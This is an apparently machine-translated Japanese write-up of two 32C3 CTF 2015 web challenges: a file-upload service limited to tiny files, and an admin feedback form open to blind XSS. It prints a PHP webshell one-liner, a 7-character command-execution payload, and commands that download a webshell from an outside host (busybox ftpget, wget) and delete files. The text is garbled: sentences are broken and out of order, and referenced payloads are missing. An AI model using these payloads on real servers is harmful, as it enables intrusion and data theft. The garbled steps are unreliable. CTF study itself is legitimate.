32C3 CTF 2 つの Web トピックの記事

0x00 はじめに

営業犬として、今でも Web での質問ができることをとても嬉しく思います。 今回は 2 つのトピックがあります。1 つは TinyHosting で、もう 1 つは Kummerkasten です。

0x01 TingHosting

非常に小さなファイル用の新しいファイル ホスティング サービスです。http://136.243.194.53/

はい。まず、ページ内で非表示の src パラメータが見つかり、URL に ?src=1 を追加すると、ページのソース コードを返すことができます。

一般的な意味は、任意のファイル名でファイルをサーバーにアップロードできるが、各ファイルの内容の長さはわずか 7 文字であるということです。

そこで、最初にグーグルで検索したところ、最も短いphp Webシェルは14文字のこれであることがわかりました:

#!php<?=`$_GET[1]`;

(追記: エラーがある場合は、元のコードは翻訳されています) ... ごめんなさい。

明らかに長さが足りません

後でよく考えて、とても重要なペイロードは次のとおりです。

#!bashz.php

内容は次のとおりです:

#!php<?=`*`;

正確に 7 文字で、それ以上でもそれ以下でもありません。

したがって、次のようにする必要があります。最初から実行チェーンを構築します。そのアイデアは次のとおりです。

#!bashbusybox ftpget two.dog w.php z.php

最初の 4 つのファイルの内容はランダムであり、w.php は上記のキー ペイロードであり、w.php を実行すると、そのコンテンツはサーバー上の Web シェルによって上書きされ、Web シェルが取得されます。 🎜>

残念なことに、busybox ftpget は IP アドレスのみをサポートし、ドメイン名はサポートしていないことがわかりました。 >

最初の 2 つのファイルの内容は満足のいくもので、z.php が重要なペイロードであり、Web シェルを取得できます。

しかし、よく見ると、この質問はみんなのディレクトリにindex.htmlを作成するため、実行チェーンが壊れて機能しなくなるため、bashを使用してindex.html

#!bashwget wtf.two.dog z.php

Constructionを強制終了します。 :

bash の内容は任意です。bb の内容は rm ./* で、上記の方法で Web シェルを取得し、その中でフラグを見つけます。

を参照してください。外国人の方法は非常にシンプルで使いやすく、bash、bb、z.php を使用するだけです。bb の内容はそれぞれ ls / 、cat /f* です。そして直接 0 0

0x02 Kummerkasten

#!bashbash bb index.html z.php

この時期、管理人は少し悲しい気持ちになっています。このサイト http://136.243.194.46/ で元気づけてもらえませんか。注意: このチャレンジはフラグ形式に従っていません。

ヒント: フラグを作成するには、両方の部分を連結し、「32C3_」を省略します。

入力後の場所は 1 つだけです。メッセージを送信するために調べましたが、XSS に関連している可能性があるものは見つかりませんでした。

ブラインド タイピング Cookie のペイロードを直接破棄した後、次の応答を受け取りました。

アクセスは以前は 403 でした。 XSS を使用してページのコンテンツを読み取ります。

XSS に jQuery を取り込んで、jQuery で操作するというのが当初の考えでしたが、ページ内に組み込まれていることが分かり、とても便利でした。

ajax を直接使用すると、ページを簡単に読み取ってポストバックできます。

/admin/bugs と /admin/token を見た

ページの情報によると、重要なのは 2 つの PNG 画像を読み取ることです。

最終的なペイロードは次のとおりです。

次に、2 つの画像の内容、mysql パスワード、および 6 桁の数字を組み合わせて FLAG を形成します。

0x03 その他

詳細については、次のリンクを参照してください:

https://github.com/ctfs/write-ups-2015/tree/master /32c3 -ctf-2015/web